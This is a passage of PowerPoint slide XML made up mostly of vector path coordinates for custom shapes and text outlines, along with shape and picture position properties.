                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192338" y="47895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200368" y="39912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205759" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237836" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236707" y="36372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231203" y="30442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223376" y="27465"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="243474" y="86410"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="242797" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240609" y="88372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236910" y="90378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226534" y="94482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221368" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243474" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243474" y="86410"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="237836" y="37905"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="219293" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224301" y="39732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230910" y="46993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232579" y="52134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232624" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244777" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244446" y="53908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242898" y="47123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240318" y="41276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237836" y="37905"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="279316" y="29562"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266639" y="29562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266639" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279316" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279316" y="48617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282767" y="45978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286376" y="43791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293932" y="40386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297541" y="39529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327271" y="39529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325857" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279316" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279316" y="29562"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="327271" y="39529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304376" y="39529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307105" y="39980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311323" y="41829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312947" y="43227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314075" y="45121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315158" y="46835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315902" y="49203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316692" y="55246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316895" y="58493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316895" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329571" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329571" y="46835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329332" y="45978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327634" y="40386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327511" y="39980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327429" y="39709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327271" y="39529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="312699" y="27465"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="300135" y="27465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295804" y="28389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287346" y="32065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283263" y="34636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279316" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325857" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318902" y="29923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312699" y="27465"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="369519" y="40206"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="356842" y="40206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356842" y="89319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358850" y="95948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366835" y="104201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372677" y="106276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382556" y="106276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385060" y="106073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390677" y="105261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393271" y="104743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395320" y="104201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395662" y="104201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395662" y="95159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380120" y="95159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378176" y="94843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377719" y="94843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374103" y="93129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369609" y="81516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369519" y="40206"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="395662" y="92724"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="394985" y="92724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393993" y="93129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392369" y="93648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390135" y="94257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387880" y="94843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385737" y="95159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395662" y="95159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395662" y="92724"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="395662" y="29562"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="348293" y="29562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348293" y="40206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395662" y="40206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395662" y="29562"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="369519" y="7937"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="356842" y="7937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356842" y="29562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369519" y="29562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369519" y="7937"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="496782" y="4509"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="463557" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463557" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476887" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476887" y="67400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497414" y="67400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503369" y="66543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512797" y="63093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516880" y="60500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521346" y="56035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476887" y="56035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476887" y="15965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523443" y="15965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521008" y="13326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513948" y="8613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510248" y="7035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501880" y="5006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496782" y="4509"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="523443" y="15965"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="494324" y="15965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497820" y="16258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503346" y="17475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515301" y="38108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514850" y="40792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493534" y="56035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521346" y="56035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523128" y="54254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525294" y="50962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528406" y="43385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529173" y="39258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529110" y="28683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528136" y="24150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523963" y="16528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523443" y="15965"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="598083" y="2683"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="585339" y="2683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578640" y="3833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547015" y="32584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543519" y="46497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543519" y="63454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561677" y="98293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585361" y="106614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596504" y="106614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622016" y="99601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624249" y="98587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626730" y="97504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626730" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587279" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582858" y="94302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557391" y="61808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557391" y="48008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558271" y="42077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586760" y="14070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626730" y="14070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626730" y="11522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620166" y="8230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614211" y="5953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603474" y="3337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598083" y="2683"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="626730" y="81900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="625782" y="81900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620888" y="86297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617144" y="88642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615402" y="89679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604399" y="93986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598376" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626730" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626730" y="81900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="626730" y="14070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="598015" y="14070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603835" y="15130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614707" y="19347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620188" y="22707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625715" y="27330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626730" y="27330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626730" y="14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1E486B87-5F03-1C35-3780-7CDF38BDC843}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7242759" y="4188142"/>
              <a:ext cx="932815" cy="310515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="932815" h="310514">
                  <a:moveTo>
                    <a:pt x="932751" y="194691"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="914298" y="139687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852995" y="88404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808875" y="65506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757135" y="45135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698830" y="27851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634974" y="14185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566610" y="4660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497751" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432460" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="5308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317042" y="14655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269176" y="28041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229349" y="45161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178333" y="89344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169379" y="115773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172732" y="143471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183832" y="163550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164579" y="159867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102679" y="158800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51079" y="168046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15087" y="185940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9677" y="238328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41249" y="263207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89865" y="282803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150685" y="294436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212585" y="295490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264185" y="286258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300164" y="268363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310286" y="251663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344995" y="265315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403301" y="282600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467156" y="296265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535508" y="305790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604367" y="310464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669671" y="310146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730275" y="305155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785075" y="295808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832954" y="282409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="872782" y="265290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="923798" y="221119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932751" y="194691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0" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7FC138-0636-5210-2DFD-BA4BDE9C122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8754" y="3753556"/>
              <a:ext cx="251018" cy="87942"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260C780E-97F5-9361-7061-047591512DF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7750725" y="3675337"/>
              <a:ext cx="269240" cy="238760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="269240" h="238760">
                  <a:moveTo>
                    <a:pt x="0" y="238460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="268767" y="190261"/>
                  </a:lnTo>
                </a:path>
                <a:path w="269240" h="238760">
                  <a:moveTo>
                    <a:pt x="0" y="48199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="268767" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="269240" h="238760">
                  <a:moveTo>
                    <a:pt x="5071" y="45662"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5071" y="2384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2" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD300939-F39C-B6E2-0A87-1C955C633ED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56871" y="3388612"/>
              <a:ext cx="722757" cy="1062989"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76FCBE00-541B-B400-292D-3B5314A4464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47264" y="4027016"/>
              <a:ext cx="413295" cy="412749"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1022AEC-B5E3-4881-339F-88191D8767DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7256643" y="4503229"/>
              <a:ext cx="820419" cy="107314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="13669" y="4509"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26526" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41233" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45417" y="87875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34759" y="87875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13669" y="4509"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="73288" y="21557"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61827" y="21557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82917" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97940" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102126" y="88687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90000" y="88687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73288" y="21557"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="124015" y="4509"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="110955" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90000" y="88687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102126" y="88687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124015" y="4509"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="69045" y="4509"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="55511" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34759" y="87875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45417" y="87875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61827" y="21557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73288" y="21557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69045" y="4509"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="181263" y="27465"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171113" y="27465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163288" y="28145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135156" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134526" y="67603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135182" y="76406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165528" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165778" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174270" y="106547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179165" y="106547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183834" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192722" y="103502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197075" y="102014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201361" y="100210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201361" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170278" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166737" y="94956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160308" y="92791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157534" y="91190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155210" y="89025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152774" y="86838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150961" y="84141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148082" y="77142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147383" y="73105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147383" y="68483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202827" y="68483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202827" y="61628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202642" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147377" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147829" y="53908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147925" y="52856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150203" y="47895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158255" y="39912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163646" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195701" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194571" y="36372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189090" y="30442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181263" y="27465"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="201361" y="86410"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200684" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198474" y="88372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194774" y="90378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184421" y="94482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179255" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201361" y="95497"/>
